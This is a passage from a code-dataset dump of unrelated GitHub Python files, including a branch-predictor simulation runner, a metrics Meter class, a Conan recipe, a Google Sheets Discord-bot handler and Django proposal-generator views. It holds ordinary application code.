2:\n\tprint(\"APROBADO\")\n\nelse:\n\tprint(\"Rechazado\")","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej3/hito1_ej3_c577f6fd2a0676d6dd8e78e7e3c42b93.py","file_name":"hito1_ej3_c577f6fd2a0676d6dd8e78e7e3c42b93.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35015215556","text":"\"\"\"\n@author : Anil kumar Reddy\n@Date : 24th sep 2020\n\"\"\"\n\nenv = \"dev\"\n\ndef get_db_configs():\n if env==\"dev\":\n port_number = 27017\n host = \"127.0.0.1\"\n else:\n port_number = 27017\n host = \"127.0.0.1\"\n return port_number,host\n\n\ndb = \"socialmedia\"\napp_users = \"app_users\"\nstreem_config = \"streem_config\"\nuser_timeline = \"user_timeline\"\nserach_keywords = \"serach_keywords\"\n","repo_name":"kunduruanil/SocialMedia","sub_path":"configration/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7490549140","text":"import matplotlib.pyplot as plt\nimport time\nimport subprocess\nimport os\n\n\ndef graph(title, x_label, y_label, x, y, legend_label = None):\n\n plt.title(title)\n plt.xlabel(x_label)\n plt.ylabel(y_label)\n\n if not legend_label:\n plt.plot(x, y, marker = 'o')\n else:\n plt.plot(x, y, marker = 'o', label = legend_label)\n plt.legend(title = 'n', loc = \"upper right\")\n\n if not legend_label:\n plt.savefig(\"graph_logs/{}.png\".format(title.replace(', ', '_')))\n plt.clf()\n\nif __name__ == \"__main__\":\n\n os.system(\"make clean && make\")\n os.makedirs(\"graph_logs\", exist_ok = True)\n\n # graph 1: n-bit smith counter\n x = [i for i in range(1, 7)]\n y = {\n \"gcc_trace.txt\": [], \n \"jpeg_trace.txt\": [], \n \"perl_trace.txt\": []\n }\n\n g1_count = 0\n\n for benchmark in y.keys():\n for b in x:\n mispred_rate = subprocess.run(\n [\"./sim\", \"smith\", str(b), benchmark, '1'], \n capture_output = True\n ).stdout\n\n mispred_rate = float(mispred_rate)\n y[benchmark].append(mispred_rate)\n\n print(\"(graph 1 - Smith): b = {} | benchmark = {}\\t | misprediction rate: {}\".format(b, benchmark, mispred_rate))\n g1_count += 1\n\n print('-' * 85)\n\n print(\"GRAPH 1 (Smith) SIMULATIONS RUN: \", g1_count)\n\n for benchmark in y.keys():\n benchmark_name = benchmark.split('_')[0].upper()\n graph(benchmark_name + \", Smith\", 'b', \"Misprediction Rate (%)\", x, y[benchmark])\n\n # graph 2: bimodal predictor\n x = [i for i in range(7, 13)]\n \n for key in y.keys():\n y[key] = []\n\n g2_count = 0\n\n for benchmark in y.keys():\n for m in x:\n mispred_rate = subprocess.run(\n [\"./sim\", \"bimodal\", str(m), benchmark, '1'], \n capture_output = True\n ).stdout\n\n mispred_rate = float(mispred_rate)\n y[benchmark].append(mispred_rate)\n\n print(\"(graph 2 - bimodal): m = {}\\t | benchmark = {}\\t | misprediction rate: {}\".format(m, benchmark, mispred_rate))\n g2_count += 1\n \n print('-' * 85)\n\n print(\"GRAPH 2 (bimodal) SIMULATIONS RUN: \", g2_count)\n\n for benchmark in y.keys():\n benchmark_name = benchmark.split('_')[0].upper()\n graph(benchmark_name + \", bimodal\", 'm', \"Misprediction Rate (%)\", x, y[benchmark])\n\n # graph 3: Gshare predictor\n for key in y.keys():\n y[key] = {}\n\n g3_count = 0\n\n for benchmark in y.keys():\n for m in x:\n for n in range(2, m + 1, 2):\n y[benchmark].setdefault(n, [])\n\n mispred_rate = subprocess.run(\n [\"./sim\", \"gshare\", str(m), str(n), benchmark, '1'], \n capture_output = True\n ).stdout\n\n mispred_rate = float(mispred_rate)\n y[benchmark][n].append(mispred_rate)\n\n print(\"(graph 3 - gshare): m = {}\\t | n = {}\\t | benchmark = {}\\t | misprediction rate: {}\".format(m, n, benchmark, mispred_rate))\n g3_count += 1\n\n print('-' * 110)\n\n print('-' * 110)\n\n print(\"GRAPH 3 (Gshare) SIMULATIONS RUN: \", g3_count)\n\n for benchmark in y.keys():\n benchmark_name = benchmark.split('_')[0].upper()\n\n for n, vals in y[benchmark].items():\n graph(benchmark_name + \", Gshare\", 'm', \"Misprediction Rate (%)\", x[-len(vals):], vals, n)\n\n plt.savefig(\"graph_logs/{}_gshare.png\".format(benchmark_name))\n plt.clf()\n\n os.system(\"make clean\")","repo_name":"kobeeraveendran/cda5106","sub_path":"hw/MachineProblem2Fall2021/branch_predict/simulation_manager.py","file_name":"simulation_manager.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"26759239767","text":"\"\"\"\nUsed for recording data\n\"\"\"\nfrom collections import OrderedDict\nfrom collections.abc import ItemsView\nfrom numbers import Number\nfrom typing import Union, Iterator, Tuple, Mapping, Sequence\n\nimport numpy as np\nimport torch\n\nfrom lumo.utils.fmt import to_ndarray, detach, is_scalar\nfrom lumo.core import PropVar\n\n\nclass Meter(metaclass=PropVar):\n def __init__(self):\n self._rec = {}\n self._avg = {}\n\n def sorted(self) -> 'Meter':\n m = Meter()\n m._rec = self._rec\n m._avg = OrderedDict()\n m._prop = self._prop\n for k in sorted(self._avg.keys()):\n m._avg[k] = self._avg[k]\n return m\n\n def todict(self):\n return self._rec\n\n @property\n def _stage(self):\n return self._prop.get('stage', 'default')\n\n @_stage.setter\n def _stage(self, value):\n self._prop['stage'] = value\n\n def __setattr__(self, key: str, value):\n if key.startswith('_'):\n super(Meter, self).__setattr__(key, value)\n else:\n self[key] = value\n\n def __getattr__(self, item):\n return self[item]\n\n def __getitem__(self, item):\n return self._rec[item]\n\n def __setitem__(self, key, value):\n value = to_ndarray(value)\n\n stg = self._avg.get(key, None)\n isscalar = value.size == 1\n\n if stg is None:\n dtype = value.dtype.name\n\n if self._stage in {'min', 'max'} and not isscalar:\n raise ValueError(\n f'Only support min/max(a) operator on scalar metrics, but got data of shape {value.shape}.')\n elif self._stage in {'min', 'max', 'sum', 'mean', 'smean'} and 'str' in dtype:\n raise ValueError(f'Only support min/max/sum/mean operator on tensor metrics, but got type {dtype}.')\n\n if self._stage == 'default':\n if isscalar:\n if 'int' in dtype:\n self._stage = 'last'\n else:\n self._stage = 'mean'\n else:\n self._stage = 'last'\n\n self._avg[key] = self._stage\n\n if isscalar:\n value = value.item()\n\n self._rec[key] = value\n self._stage = 'default'\n\n def __repr__(self):\n return ' | '.join([f'{k}: {v}' for k, v in self._rec.items()])\n\n def __iter__(self):\n yield from self.keys()\n\n @property\n def sum(self):\n self._stage = 'sum'\n return self\n\n @property\n def mean(self):\n self._stage = 'mean'\n return self\n\n @property\n def last(self):\n self._stage = 'last'\n return self\n\n @property\n def max(self):\n self._stage = 'max'\n return self\n\n @property\n def min(self):\n self._stage = 'min'\n return self\n\n @property\n def smean(self):\n self._stage = 'smean'\n return self\n\n def update(self, dic: Mapping) -> 'Meter':\n for k, v in dic.items():\n self[str(k)] = v\n return self\n\n def serialize(self) -> OrderedDict:\n res = OrderedDict()\n for k, v in self.items():\n res[k] = f'{v}'\n return res\n\n def items(self) -> ItemsView:\n return self._rec.items()\n\n def keys(self):\n return self._rec.keys()\n\n @staticmethod\n def from_dict(dic: Mapping):\n m = Meter()\n for k, v in dic.items():\n m[k] = v\n return m\n\n def scalar_items(self) -> Iterator[Tuple[str, Number]]:\n for k, v in self.items():\n nd = to_ndarray(v)\n if is_scalar(nd):\n yield k, nd.item()\n\n\nclass AvgItem:\n SLIDE_WINDOW_SIZE = 100\n EXP_WEIGHT = 0.75\n\n def __init__(self, item, gb_method):\n item_ = detach(item)\n self.gb_method = gb_method # groupby method\n self.acc = [item_]\n self.c = 1\n self.cur = item\n self.last = item_\n self.offset = item_\n self.nd = to_ndarray(item)\n self.isint = 'int' in self.nd.dtype.name\n self.isnumber = (self.isint or 'float' in self.nd.dtype.name) and isinstance(item, (np.ndarray,\n torch.Tensor))\n self.isscalar = self.nd.size == 1\n if not self.isscalar and gb_method in {'min', 'max'}:\n raise AssertionError(f'{gb_method} method only support scaler')\n\n def __repr__(self):\n \"\"\"\n simpler but more time-comsuming method could be some math function, not in if-else branch, like\n prec = max(min(8, int(np.ceil(np.log10((1 / (self.offset + 1e-10)))))), 1)\n fmt_str = f'{{:.{prec}f}}'\n return fmt_str.format(res)\n \"\"\"\n res = self.res\n if self.isscalar:\n res = to_ndarray(res).item()\n if self.isint:\n return f\"{res}\"\n elif self.isnumber:\n # return f'{res:.4f}'\n if self.offset < 1e-8:\n return f'{res:.10f}'\n elif self.offset < 1e-6:\n return f'{res:.8f}'\n elif self.offset < 1e-4:\n return f'{res:.6f}'\n return f'{res:.4f}'\n else:\n return f'{res}'\n else:\n return f'{res}'\n\n __str__ = __repr__\n\n def update(self, item):\n self.cur = item\n item = detach(item)\n\n avg = self.gb_method\n if self.isnumber:\n self.offset = self.offset * AvgItem.EXP_WEIGHT + abs(item - self.last) * (1 - AvgItem.EXP_WEIGHT)\n\n if avg == 'slide':\n self.acc.append(item)\n if len(self.acc) > AvgItem.SLIDE_WINDOW_SIZE:\n self.acc.pop(0)\n self.last = self.cur\n elif avg in {'mean', 'sum'}:\n self.acc[0] = self.acc[0] + item\n self.c += 1\n elif avg == 'max':\n self.last = max(self.cur, self.last)\n elif avg == 'min':\n self.last = min(self.cur, self.last)\n elif avg == 'last':\n self.last = item\n\n @property\n def res(self):\n avg = self.gb_method\n if avg == 'slide':\n return np.mean(self.acc)\n if avg == 'mean':\n return self.acc[0] / self.c\n elif avg == 'sum':\n return self.acc[0]\n elif avg in {'max', 'min', 'last'}:\n return self.last\n return self.cur\n","repo_name":"sailist/emotion-recognition-in-conversation","sub_path":"lumo/core/meter.py","file_name":"meter.py","file_ext":"py","file_size_in_byte":6462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"10317537390","text":"import psycopg2\nimport os\nimport winshell\nfrom win32com.client import Dispatch\nfrom dotenv.main import load_dotenv\n\ndef connectDataBase():\n\n load_dotenv()\n\n con = psycopg2.connect(\n dbname = \"agendador\",\n user = \"postgres\",\n password = os.environ[\"DATABASE_PASSWORD\"],\n host = \"localhost\"\n )\n\n return con\n\n\ndef createDesktopShortcut():\n local_path = os.getcwd()\n desktop = winshell.desktop()\n shortcutPath = os.path.join(desktop, \"Agendador ePROC.lnk\")\n target = os.path.join(local_path, \"Agendador ePROC.exe\")\n iconPath = os.path.join(local_path, \"img/icon.ico\")\n\n if not os.path.exists(shortcutPath):\n shell = Dispatch('WScript.Shell')\n shortcut = shell.CreateShortCut(shortcutPath)\n shortcut.Targetpath = target\n shortcut.WorkingDirectory = local_path\n shortcut.IconLocation = iconPath\n shortcut.save()\n","repo_name":"gianluca-magnabosco/Agendador-ePROC","sub_path":"functions/aux_functions.py","file_name":"aux_functions.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"18842037032","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 4 13:21:44 2022\r\n\r\n@author: amacemirhan\r\nBanker algoritmasi\r\n\"\"\"\r\nimport numpy\r\n\r\navailable = [3,3,2]\r\nallocation = [[0,1,0],[2,0,0],[3,0,2],[2,1,1],[0,0,2]]\r\nMax = [[7,5,3],[3,2,2],[9,0,2],[2,2,2],[4,3,3]]\r\n\r\navailable = numpy.asarray(available)#converting numpy array\r\nallocation = numpy.asarray(allocation)\r\nMax = numpy.asarray(Max)\r\nNeed = Max-allocation\r\ncompleted = numpy.array([])\r\na=[False,False,False,False,False]\r\nitarate=0\r\nwhile(a.count(True)!=5 and itarate<30):\r\n itarate += 1\r\n for i in range(5):\r\n comparison = available > Need[i]\r\n if a[i]:\r\n continue\r\n elif(comparison.all()):\r\n print(\"P\",str(i),\" \")\r\n available += Max[i]\r\n a[i]=True\r\nif (a.count(True)==5):\r\n print(\"deadlock olusmadi\")\r\nelse:\r\n print(\"deadlock olustu. P\",(a.index(False)),\" icin gerekenler \",str(Need[a.index(False)]-available))\r\n ","repo_name":"amacemirhan/Python-Workshops","sub_path":"untitled1.py","file_name":"untitled1.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71544735288","text":"import RPi.GPIO as GPIO\nimport picamera\nimport time\n \nGPIO.setmode(GPIO.BCM)\nGPIO.setup(24, GPIO.IN)\n#uses pin 24\n\ncounter = 0\nid = 1 #which Pi is this?\ncamera = picamera.PiCamera()\n\ncamera.resolution = (1920, 1080)\ncamera.start_preview()\n# Camera warm-up time\ntime.sleep(2)\n\nwhile True:\n if ( GPIO.input(24) == False ):\n camera.capture('/media/Uploaded_Pictures/cam_' + str(id) + '_' + str(counter) + '.jpg')\n counter = counter + 1","repo_name":"elendiastarman/jaw-tracking","sub_path":"takePics.py","file_name":"takePics.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"31960354765","text":"from conan import ConanFile\nfrom conan.tools.files import get, copy, replace_in_file\nfrom conan.tools.cmake import CMake, CMakeToolchain, cmake_layout\n\nimport os\n\nrequired_conan_version = \">=1.53.0\"\n\nclass PlutoVGConan(ConanFile):\n name = \"plutovg\"\n description = \"Tiny 2D vector graphics library in C\"\n license = \"MIT\",\n topics = (\"vector\", \"graphics\", )\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"https://github.com/sammycage/plutovg\"\n package_type = \"library\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n }\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n self.options.rm_safe(\"fPIC\")\n self.settings.rm_safe(\"compiler.libcxx\")\n self.settings.rm_safe(\"compiler.cppstd\")\n\n def layout(self):\n cmake_layout(self, src_folder=\"src\")\n\n def source(self):\n get(self, **self.conan_data[\"sources\"][self.version], strip_root=True)\n\n def generate(self):\n tc = CMakeToolchain(self)\n tc.variables[\"CMAKE_WINDOWS_EXPORT_ALL_SYMBOLS\"] = True\n tc.generate()\n\n def build(self):\n replace_in_file(self, os.path.join(self.source_folder, \"CMakeLists.txt\"),\n \"add_library(plutovg STATIC)\", \"add_library(plutovg)\")\n replace_in_file(self, os.path.join(self.source_folder, \"CMakeLists.txt\"),\n \"add_subdirectory(example)\", \"\")\n cmake = CMake(self)\n cmake.configure()\n cmake.build()\n\n def package(self):\n copy(self, pattern=\"LICENSE\", dst=os.path.join(self.package_folder, \"licenses\"), src=self.source_folder)\n copy(self, pattern=\"*.h\", dst=os.path.join(self.package_folder, \"include\"), src=os.path.join(self.source_folder, \"include\"))\n copy(self, pattern=\"*.a\", dst=os.path.join(self.package_folder, \"lib\"), src=self.build_folder, keep_path=False)\n copy(self, pattern=\"*.so\", dst=os.path.join(self.package_folder, \"lib\"), src=self.build_folder, keep_path=False)\n copy(self, pattern=\"*.lib\", dst=os.path.join(self.package_folder, \"lib\"), src=self.build_folder, keep_path=False)\n copy(self, pattern=\"*.dll\", dst=os.path.join(self.package_folder, \"bin\"), src=self.build_folder, keep_path=False)\n copy(self, pattern=\"*.dylib\", dst=os.path.join(self.package_folder, \"lib\"), src=self.build_folder, keep_path=False)\n\n def package_info(self):\n self.cpp_info.libs = [\"plutovg\"]\n if self.settings.os in (\"FreeBSD\", \"Linux\"):\n self.cpp_info.system_libs = [\"m\"]\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/plutovg/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"34253587833","text":"from __future__ import print_function, unicode_literals\nfrom pprint import pprint\nfrom PyInquirer import prompt, Separator\nfrom tvdb_api import BaseUI\n\nclass CustomUI(BaseUI):\n\n def selectSeries(self, allSeries,limit=6):\n \n # print(allSeries)\n seriesList = [{\n 'type' : 'list',\n 'name' : 'seriesName',\n 'message' : 'Select Your Tv Series',\n }]\n\n choices = []\n\n for i,show in enumerate(allSeries):\n choices.append({\n 'name': show['seriesName'],\n 'value': i+1\n })\n\n seriesList[0]['choices'] = choices\n\n answers = prompt(seriesList)\n\n return allSeries[answers['seriesName']-1]","repo_name":"atulya2109/tv-renamer","sub_path":"src/tv/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42730759634","text":"ORDERINGS = [\n 'Home',# anteatery main dish\n 'Oven',# anteatery pizza\n 'Fire And Ice Round Grill',# anteatery main dish 2\n 'Grubb / Mainline',# brandywine main dish\n 'Compass',# brandywine main dish 2\n 'Hearth/Pizza',# brandywine pizza\n 'Deli',# anteatery sandwiches\n 'The Farm Stand / Deli',\n 'Crossroads',# brandywine 3rd entree\n 'Sizzle Grill',# anteatery burgers\n 'Ember/Grill',# brandywine burgers\n 'Vegan',# both vegan\n 'Bakery',# anteatery dessert\n 'Honeycakes/Bakery',# brandywine dessert\n 'Soups',# both soup\n \"Farmer's Market\",# anteatery salad\n 'The Farm Stand / Salad Bar'# brandywine salad\n]\n\ndef station_ordering_key(station_name: str) -> int:\n '''\n Returns an integer used to sort station names by relevance (basically Eric's personal preferences 😋)\n '''\n try:\n return ORDERINGS.index(station_name)\n except ValueError:# if \n print(f\"ValueError (NON-BREAKING) on station orderings. Key {station_name} is not in list\")\n return -1","repo_name":"EricPedley/zotmeal-backend","sub_path":"api/sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"8092907436","text":"import gspread\nimport pandas as pd\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom gspread_dataframe import set_with_dataframe\n\nscope = ['https://spreadsheets.google.com/feeds',\n 'https://www.googleapis.com/auth/drive']\ncreds = ServiceAccountCredentials.from_json_keyfile_name('credentials.json',\n scope)\nclient = gspread.authorize(creds)\nwotvspreadsheet = client.open('Ildyra Bot')\nramadaspreadsheet = client.open('Ramada Bot')\n\n\nclass DfHandlerWotv():\n \"\"\"Object to handle WOTV sheets related operations.\"\"\"\n def __init__(self):\n \"\"\"Object initialisation.\"\"\"\n # Dictionary to save various IDs.\n self.ids = {\n 'WOTV Events': [],\n 'FFBE Server': [],\n 'WOTV Newsfeed': [],\n 'WOTV Sync': [],\n }\n # Initial synchronisations.\n self.sync()\n self.sync_events()\n\n def sync(self):\n \"\"\"\"To construct or refresh tables from Google sheets.\"\"\"\n # Equipment data.\n df = pd.DataFrame(\n wotvspreadsheet.worksheet('WOTV_eq').get_all_records())\n self.eq = df.set_index('EQ Name')\n # Trust master data.\n df = pd.DataFrame(\n wotvspreadsheet.worksheet('WOTV_tm').get_all_records())\n self.tm = df.set_index('Unit Name')\n # Vision card data.\n df = pd.DataFrame(\n wotvspreadsheet.worksheet('WOTV_vc').get_all_records())\n self.vc = df.set_index('VC Name')\n # Esper data.\n df = pd.DataFrame(\n wotvspreadsheet.worksheet('WOTV_esper').get_all_records())\n self.esper = df.set_index('Esper')\n # Material name table.\n df = pd.DataFrame(\n ramadaspreadsheet.worksheet('WOTV_matname').get_all_records())\n self.mat = df.set_index('Material')\n # Shortcut table.\n df = pd.DataFrame(\n ramadaspreadsheet.worksheet('WOTV_shortcut').get_all_records())\n self.shortcut = df[df['Type'] == 'shortcut']\\\n .drop('Type', axis=1).set_index('Shortcut')\n self.replace = df[df['Type'] == 'replace']\\\n .drop('Type', axis=1).set_index('Shortcut')\n self.eq_type = df[df['Type'] == 'eq_type']\\\n .drop('Type', axis=1).set_index('Shortcut')\n self.w_type = df[df['Type'] == 'w_type']\\\n .drop('Type', axis=1).set_index('Shortcut')\n self.removal = df[df['Type'] == 'removal']\\\n .drop('Type', axis=1).set_index('Shortcut')\n # Text table.\n self.text = pd.DataFrame(\n ramadaspreadsheet.worksheet('WOTV_text').get_all_records())\n # Fluff tables.\n self.stars = pd.DataFrame(\n ramadaspreadsheet.worksheet('WOTV_stars').get_all_records())\n self.rand = pd.DataFrame(\n ramadaspreadsheet.worksheet('WOTV_rand').get_all_records())\n # Import various ids.\n df_ids = pd.DataFrame(\n ramadaspreadsheet.worksheet('my_ids').get_all_records())\n for k in self.ids.keys():\n self.ids[k] = df_ids[df_ids['Type'] == k]['ID'].tolist()\n\n def sync_events(self):\n \"\"\"Event data.\n Separated because it is updated more frequently.\n \"\"\"\n # Event data.\n self.events = pd.DataFrame(\n ramadaspreadsheet.worksheet('WOTV_events').get_all_records())\n\n def add_event(self, event):\n \"\"\"Used for when adding events via discord command.\"\"\"\n ramadaspreadsheet.worksheet('WOTV_events').append_row(event)\n self.sync_events()\n\n\nclass DfHandlerGen():\n \"\"\"Object handling general sheets related operations.\"\"\"\n def __init__(self):\n \"\"\"Object initialisation.\"\"\"\n # Initial synchronisation.\n self.sync()\n\n def sync(self):\n \"\"\"\"To construct or refresh tables from Google sheets.\"\"\"\n # Sheet for personal shortcuts.\n self.shortcuts = pd.DataFrame(\n ramadaspreadsheet.worksheet('my_shortcuts').get_all_records())\n # Sheet for tags.\n self.tags = pd.DataFrame(\n ramadaspreadsheet.worksheet('my_tags').get_all_records()\n )\n self.tags[\"Tag\"] = self.tags[\"Tag\"].astype(str)\n self.tags_last = len(self.tags) + 1\n # Sheet for ids.\n self.ids = pd.DataFrame(\n ramadaspreadsheet.worksheet('my_ids').get_all_records())\n self.ids['ID'] = self.ids['ID'].astype('int64')\n\n def add_shortcut(self, *arg):\n \"\"\"Used for when adding shortcuts via discord command.\"\"\"\n ramadaspreadsheet.worksheet('my_shortcuts').append_row(list(arg))\n self.sync()\n\n def sync_tags(self, clean=False):\n \"\"\"Sync local Data to Google sheets.\"\"\"\n df = self.tags.copy()\n df['User'] = df['User'].apply(str)\n try:\n if clean:\n ramadaspreadsheet.values_clear(f\"my_tags!A2:E{self.tags_last}\")\n self.tags_last = len(self.tags) + 1\n set_with_dataframe(\n ramadaspreadsheet.worksheet('my_tags'),\n df,\n include_index=False\n )\n return 1\n except gspread.exceptions.APIError as e:\n return e\n","repo_name":"shaunyongfc/gsheet_bot","sub_path":"gsheet_handler.py","file_name":"gsheet_handler.py","file_ext":"py","file_size_in_byte":5288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10731708553","text":"import discord\nimport yaml\nimport brut\n\n\n###Load config\ntry:\n with open('conf.yaml') as file:\n conf = yaml.safe_load(file)\nexcept Exception as e:\n print(e)\n exit()\n\ntry:\n token = conf['credentials']['token']\nexcept Exception as e:\n print(e)\n exit()\n\nbruv_list = [\n'bruv',\n'brut',\n'brunt',\n'bruck',\n'bruc',\n'bruk',\n'brub',\n'brug',\n'bruh',\n'bruy',\n'bruf',\n'bruph',\n'brud',\n'brun',\n'brum',\n'brup'\n]\n\n\n\n\nclient = discord.Client()\n\n\n@client.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(client))\n\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n\n\n #Brut Scores\n\n if message.content.lower() == '!globalbrutscore':\n await brut.GetTopBrutHighScores(message)\n return\n \n if message.content.lower() == '!channelbrutscore':\n await brut.GetChannelBrutHighScores(message)\n return\n \n if message.content.lower() == '!serverbrutscore':\n await brut.GetServerBrutHighScores(message)\n return\n \n if message.content.lower() == '!mybrutscore':\n await brut.GetUserBrutScore(message)\n return\n\n #Check for brutlist match\n for bruv in bruv_list:\n if bruv in message.content.lower():\n #check for a close match, maybe some punctuation at the end\n if len(message.content) <= (len(bruv) +4 ):\n matched_string = bruv\n else: \n matched_string = 'miss'\n #Send message and log\n await brut.Brut(message, matched_string)\n return\n\n\n\n\nclient.run(token)","repo_name":"Xidium/brot","sub_path":"brot.py","file_name":"brot.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13472643814","text":"from django.shortcuts import get_object_or_404, get_list_or_404\nfrom django.views.generic import RedirectView, View\nfrom django.http import JsonResponse\nfrom django.views.generic.base import ContextMixin, TemplateResponseMixin\n\nimport proposal.models\nimport proposal.serializers\nfrom resthelper.views import FormModelViewSet \nfrom reorderhelper.views import ReorderMixin\nfrom proposal.jinjaHandler import JinjaHandler, PropgenTemplateException\n\n# automatically generate the main ModelViewSets\n\nimport pypandoc\nimport pathlib\n\nimport os\nimport shutil\nimport tarfile\nimport re\nimport subprocess\n\n\nclass SomeModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.SomeModelSerializers\n model_class = proposal.models.SomeModel\n list_template = \"SomeModelTemplate.html\"\n detail_template = \"SomeModel_DetailTemplate.html\"\n form_template = \"SomeModel_FormTemplate.html\"\n\nclass PartnertypeModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.PartnertypeSerializer\n model_class = proposal.models.Partnertype\n\n\nclass PartnerModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.PartnerSerializer\n model_class = proposal.models.Partner\n\n\nclass WorkpackageModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.WorkpackageSerializer\n model_class = proposal.models.Workpackage\n\n\nclass TaskModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.TaskSerializer\n model_class = proposal.models.Task\n\n\nclass DeliverableModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.DeliverableSerializer\n model_class = proposal.models.Deliverable\n\n\nclass MilestoneModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.MilestoneSerializer\n model_class = proposal.models.Milestone\n\nclass ProjectModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.ProjectSerialier\n model_class = proposal.models.Project\n\n\nclass ProducableTypesModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.ProducableTypesSerializer\n model_class = proposal.models.ProducableTypes\n\nclass DisseminationTypesModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.DisseminationTypesSerializer\n model_class = proposal.models.DisseminationTypes\n\n\n# not sure about these;\n# probably better incorporated into the various Task/deliverable/Milestone\n# views and templates? \n\nclass TaskPartnerPMModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.TaskPartnerPMSerializer\n model_class = proposal.models.TaskPartnerPM\n\n\nclass DeliverablePartnerPMModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.DeliverablePartnerPMSerializer\n model_class = proposal.models.DeliverablePartnerTaskPM\n\n\nclass MilestonePartnerPMModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.MilestonePartnerPMSerializer\n model_class = proposal.models.MilestonePartnerTaskPM\n \nclass SettingsModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.SettingsSerializer\n model_class = proposal.models.Setting\n\n # def get_renderer_context(self):\n # context = super().get_renderer_context()\n # context['bla'] = \"ksjdfksdhf\"\n # # print(\"setting view context: \", context)\n # return context\n #\n # def get_serializer_context(self):\n # context = super().get_serializer_context()\n # # groups = proposal.models.Setting.values('group').distinct()\n # # context['names'] = []\n # # for g in groups:\n # # tmp = proposal.models.Setting.objects.filter(group=g)\n # # context['names'].append((g, tmp,))\n # context['viewcontext'] = \"aha!\"\n # return context\n\nclass TemplateModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.TemplateSerializer\n model_class = proposal.models.Template\n\nclass TextblockModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.TextblockSerializer\n model_class = proposal.models.Textblock\n\nclass BibliographyModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.BibliographySerializer\n model_class = proposal.models.Bibliography\n\n\n##########################################\n# Serious views below\n\nclass ExecutionView(TemplateResponseMixin, ContextMixin, View):\n\n def get(self, request, *args, **kwargs):\n context = self.get_context_data(**kwargs)\n response_kwargs = {'content_type': request.content_type}\n data = self.entrypoint(**kwargs)\n if request.content_type == 'application/json' or \\\n ('HTTP_ACCEPT' in request.META and 'application/json' in request.META['HTTP_ACCEPT']):\n return JsonResponse(data)\n context.update(data)\n return self.response_class(\n request=request,\n template=self.get_template_names(),\n context=context,\n using=self.template_engine,\n **response_kwargs\n )\n\n def entrypoint(self, **kwargs):\n pass\n\n\nclass ExecuteTemplates(ExecutionView):\n template_name = \"execute_template.html\"\n\n def get_settings(self):\n self.template_dir = proposal.models.Setting.get_default('dirs', 'templates')\n self.latex_dir = proposal.models.Setting.get_default('dirs', 'latex')\n\n\n def export_bibliographies(self):\n r = []\n for bib in proposal.models.Bibliography.objects.filter(filename__endswith=\".bib\"):\n \"\"\"TODO: so far, only handle bibtex files\"\"\"\n with open(os.path.join(self.latex_dir, bib.filename), 'w') as fp:\n fp.write(bib.bibliography)\n r.append({'obj': {'id': bib.id, 'name': bib.name}, 'result': \"written to disk\"})\n return r\n\n def execute_template(self, template, jh, dir=\"\"):\n # print(\"running: {}\".format(template.name))\n try:\n output = jh.render(template)\n msg = \"ok\"\n except PropgenTemplateException as e:\n output = \"ERROR occured: \" + 